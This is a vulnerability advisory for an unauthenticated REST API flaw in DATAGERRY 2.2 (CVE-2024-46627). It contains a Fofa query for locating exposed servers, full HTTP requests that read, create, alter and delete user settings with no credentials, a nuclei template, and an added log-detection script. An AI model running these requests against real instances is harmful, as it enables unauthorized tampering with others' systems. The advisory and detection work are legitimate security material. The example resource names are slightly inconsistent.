0x01 Product description:
DATAGERRY is a flexible open-source CMDB and asset management tool that leaves the definition of the data model entirely to the user. Users simply define their own object types (such as servers, routers, leased lines, locations, etc.) in an easy-to-use web frontend. Through DATAGERRY's export API, CMDB objects stored in DATAGERRY can easily be exported to external systems such as monitoring systems, ticketing systems, configuration management and so on.
0x02 Vulnerability description:
DATAGERRY version 2.2 has a security vulnerability caused by missing access control in the REST API for the following endpoint (/rest/users/<id>/settings/). It allows an attacker, without any authentication, to read any user's settings, create settings, delete settings and update settings.
0x03 Affected versions:
DATAGERRY: 2.2
0x04 Search query:
Fofa:title="datagerry"
0x05 Reproduction:
This vulnerability only exists in version 2.2: the REST API lacks access control on the endpoints below, so user settings can be created, read, updated and deleted without authentication.
Affected API endpoints
- /rest/users/<id>/settings/ (GET, POST)
- /rest/users/<id>/settings/<setting> (DELETE, PUT)
The exact field layout for the request bodies can be taken from the official documentation when constructing the requests:
2. User Management (DATAGERRY documentation)
Reproduction steps:
Get all settings objects:
GET /rest/users/1/settings/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close
Query one specific settings object:
Note: replace the path segment after settings/ with the resource key of the setting you want to query.
GET /rest/users/1/settings/framework-type?typeAddSuccess=3 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
Create an arbitrary settings object:
POST /rest/users/1/settings/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close
{
    "resource" : "framework-object-type-51121",
    "user_id" : 1,
    "setting_type" : "APPLICATION"
}
Update the data of the created object:
PUT /rest/users/1/settings/framework-object-type-5111 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close
{
    "resource" : "framework-object-type-5111",
    "user_id" : 1,
    "payload" : {},
    "setting_type" : "GLOBAL"
}
Delete the selected object's data:
DELETE /rest/users/1/settings/framework-object-type-51121 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json,text/plain,*/*
Connection: close
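The requests above all succeed on an unpatched 2.2 instance without any credentials, which is also what makes the issue visible in access logs: a 2xx answer to a request that carried no Authorization header. The following is an added example, not code from the original post or from DATAGERRY, that runs such detection logic over constructed log lines. It assumes (this is not stated on the page) that a reverse proxy in front of DATAGERRY writes an nginx-style combined access log with one extra trailing field recording whether an Authorization header was present ("auth" or "noauth"); the path pattern covers both endpoint shapes listed above, including a query string after the setting name.

```python
"""Detection logic for unauthenticated access to the DATAGERRY user-settings
endpoints named in this advisory.

Added example, not code from the original post or from DATAGERRY. It assumes
(not stated on the page) that a reverse proxy in front of DATAGERRY writes an
nginx-style combined access log extended with one trailing field that records
whether the request carried an Authorization header ("auth" / "noauth").
The lines in SAMPLE_LOG are constructed for this example.
"""
import re
from typing import Iterable, List, NamedTuple

# The two endpoint shapes the advisory lists:
#   /rest/users/<id>/settings/           (GET, POST)
#   /rest/users/<id>/settings/<setting>  (PUT, DELETE)
# A query string (e.g. ?typeAddSuccess=3) may follow the setting name.
SETTINGS_PATH = re.compile(
    r"^/rest/users/(?P<uid>\d+)/settings(?:/(?P<setting>[^/?\s]*))?/?(?:\?.*)?$"
)

# Combined log format plus the assumed trailing auth-presence field.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<auth>auth|noauth)$'
)


class Finding(NamedTuple):
    ip: str
    timestamp: str
    method: str
    user_id: str
    setting: str   # empty for the collection endpoint /settings/
    status: int


def find_unauthenticated_settings_access(lines: Iterable[str]) -> List[Finding]:
    """Return every request that hit a settings endpoint without an
    Authorization header and still received a 2xx response.

    A patched instance answers such requests with 401/403, so a 2xx here is
    the vulnerable behaviour itself, not merely an attempt.
    """
    findings: List[Finding] = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in the expected log format; skip
        p = SETTINGS_PATH.match(m["path"])
        if not p:
            continue  # some other endpoint
        status = int(m["status"])
        if m["auth"] == "noauth" and 200 <= status < 300:
            findings.append(Finding(
                ip=m["ip"],
                timestamp=m["ts"],
                method=m["method"],
                user_id=p["uid"],
                setting=p["setting"] or "",
                status=status,
            ))
    return findings


def summarize(findings: Iterable[Finding]) -> dict:
    """Count findings per source IP and HTTP method."""
    summary: dict = {}
    for f in findings:
        per_ip = summary.setdefault(f.ip, {})
        per_ip[f.method] = per_ip.get(f.method, 0) + 1
    return summary


# Constructed sample log: three unauthenticated 2xx hits (vulnerable behaviour),
# one authenticated hit, one 401 as a patched instance would answer, and one
# unrelated endpoint.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:12:00:01 +0000] "GET /rest/users/1/settings/ HTTP/1.1" 200 512 "-" "Mozilla/5.0" noauth',
    '203.0.113.7 - - [10/Oct/2024:12:00:02 +0000] "POST /rest/users/1/settings/ HTTP/1.1" 201 98 "-" "Mozilla/5.0" noauth',
    '203.0.113.7 - - [10/Oct/2024:12:00:03 +0000] "DELETE /rest/users/1/settings/framework-object-type-51121 HTTP/1.1" 202 0 "-" "Mozilla/5.0" noauth',
    '198.51.100.4 - - [10/Oct/2024:12:00:04 +0000] "GET /rest/users/1/settings/framework-type?typeAddSuccess=3 HTTP/1.1" 200 311 "-" "Mozilla/5.0" auth',
    '203.0.113.7 - - [10/Oct/2024:12:00:05 +0000] "GET /rest/users/1/settings/ HTTP/1.1" 401 0 "-" "Mozilla/5.0" noauth',
    '203.0.113.7 - - [10/Oct/2024:12:00:06 +0000] "GET /rest/objects/ HTTP/1.1" 200 10 "-" "Mozilla/5.0" noauth',
]


if __name__ == "__main__":
    hits = find_unauthenticated_settings_access(SAMPLE_LOG)
    for h in hits:
        print(f"{h.timestamp} {h.ip} {h.method} user={h.user_id} "
              f"setting={h.setting!r} -> {h.status}")
    print(summarize(hits))
```

Only the three unauthenticated 2xx lines are reported; the authenticated GET, the 401 and the unrelated endpoint are skipped. The 2xx filter is deliberate: after the upgrade the same log field lets you confirm the fix, because the "noauth" requests start to produce 401/403 and the finding list becomes empty.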
Attached: the PoC from the official nuclei templates
id: CVE-2024-46627

info:
  name: DATAGERRY - REST API Auth Bypass
  author: gy741
  severity: critical
  description: |
    Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.
  impact: |
    Allows unauthorized access to REST API
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-46627
    - https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/
    - https://datagerry.com/
    - https://github.com/DATAGerry/
    - https://github.com/d4lyw/CVE-2024-46627
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-46627
    cwe-id: CWE-284
    epss-score: 0.00045
    epss-percentile: 0.16328
  metadata:
    verified: true
    max-request: 1
    vendor: becon
    product: datagerry
    shodan-query: http.title:"datagerry"
  tags: cve,cve2024,becon,datagerry,unauth,auth-bypass

http:
  - method: GET
    path:
      - '{{BaseURL}}/rest/users/1/settings/'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"response_type":'
          - '"model":'
          - '"time":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"
# digest: 4a0a00473045022040420efc711ffd5727fa72189da9f4e2830a0a1bd247edefb9c439
0x06 Remediation:
Update to the latest version.
Source: https://blog.csdn.net/xc_214/article/details/142846232